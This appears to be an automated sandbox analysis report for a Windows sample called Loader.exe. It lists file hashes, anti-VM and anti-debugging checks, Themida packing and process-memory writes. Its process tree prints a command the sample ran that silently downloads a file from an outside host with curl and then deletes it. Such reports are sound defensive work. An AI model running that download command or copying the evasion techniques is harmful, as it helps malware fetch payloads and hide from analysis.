Analysis
-
max time kernel
28s -
max time network
33s -
platform
windows7_x64 -
resource
win7-20230220-en -
resource tags
arch:x64arch:x86image:win7-20230220-enlocale:en-usos:windows7-x64system -
submitted
29-03-2023 23:36
Behavioral task
behavioral1
Sample
Loader.exe
Resource
win7-20230220-en
windows7-x64
7 signatures
30 seconds
General
-
Target
Loader.exe
-
Size
3.3MB
-
MD5
aa27322c80872d70bcd3eabde5f88141
-
SHA1
daef906c51350e74bc7eeace80e35b1bb2e2f443
-
SHA256
4b08cc716f6f89415e2dc85e3c4eb626fcb9b0697f1596d5a27482b5a40d3227
-
SHA512
12ad87b7ab61c92246ddae74eaa62223be948b57abcea1024b21a63bc0e1e6db66c3d911bbe30c857426602436a2a92479323513f25df9b683cda127a84e594e
-
SSDEEP
49152:F/4780JJXqoYgkt9fT5mhaKG/iKz8Sn/Jypm+IUK7AYoL2ENttSIyUA8z/haouab:cfit/R6Kz8S0IjgvPxyfQ54Yfsxbhc
Malware Config
Signatures
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 1 IoCs
Processes:
Loader.exedescription ioc process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Loader.exe -
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
Processes:
Loader.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Loader.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion Loader.exe -
Processes:
resource yara_rule behavioral1/memory/1696-54-0x000000013F390000-0x000000013FCB5000-memory.dmp themida behavioral1/memory/1696-55-0x000000013F390000-0x000000013FCB5000-memory.dmp themida behavioral1/memory/1696-56-0x000000013F390000-0x000000013FCB5000-memory.dmp themida behavioral1/memory/1696-57-0x000000013F390000-0x000000013FCB5000-memory.dmp themida behavioral1/memory/1696-58-0x000000013F390000-0x000000013FCB5000-memory.dmp themida -
Processes:
Loader.exedescription ioc process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Loader.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs
Processes:
Loader.exepid process 1696 Loader.exe -
Suspicious behavior: EnumeratesProcesses 19 IoCs
Processes:
Loader.exepid process 1696 Loader.exe 1696 Loader.exe 1696 Loader.exe 1696 Loader.exe 1696 Loader.exe 1696 Loader.exe 1696 Loader.exe 1696 Loader.exe 1696 Loader.exe 1696 Loader.exe 1696 Loader.exe 1696 Loader.exe 1696 Loader.exe 1696 Loader.exe 1696 Loader.exe 1696 Loader.exe 1696 Loader.exe 1696 Loader.exe 1696 Loader.exe -
Suspicious use of WriteProcessMemory 6 IoCs
Processes:
Loader.exedescription pid process target process PID 1696 wrote to memory of 588 1696 Loader.exe cmd.exe PID 1696 wrote to memory of 588 1696 Loader.exe cmd.exe PID 1696 wrote to memory of 588 1696 Loader.exe cmd.exe PID 1696 wrote to memory of 1004 1696 Loader.exe cmd.exe PID 1696 wrote to memory of 1004 1696 Loader.exe cmd.exe PID 1696 wrote to memory of 1004 1696 Loader.exe cmd.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\Loader.exe"C:\Users\Admin\AppData\Local\Temp\Loader.exe"1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c curl --silent > OUTPUT.TXT https://auxy.gay/loader/loader.txt2⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c del OUTPUT.TXT >NUL2⤵
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
memory/1696-54-0x000000013F390000-0x000000013FCB5000-memory.dmpFilesize
9.1MB
-
memory/1696-55-0x000000013F390000-0x000000013FCB5000-memory.dmpFilesize
9.1MB
-
memory/1696-56-0x000000013F390000-0x000000013FCB5000-memory.dmpFilesize
9.1MB
-
memory/1696-57-0x000000013F390000-0x000000013FCB5000-memory.dmpFilesize
9.1MB
-
memory/1696-58-0x000000013F390000-0x000000013FCB5000-memory.dmpFilesize
9.1MB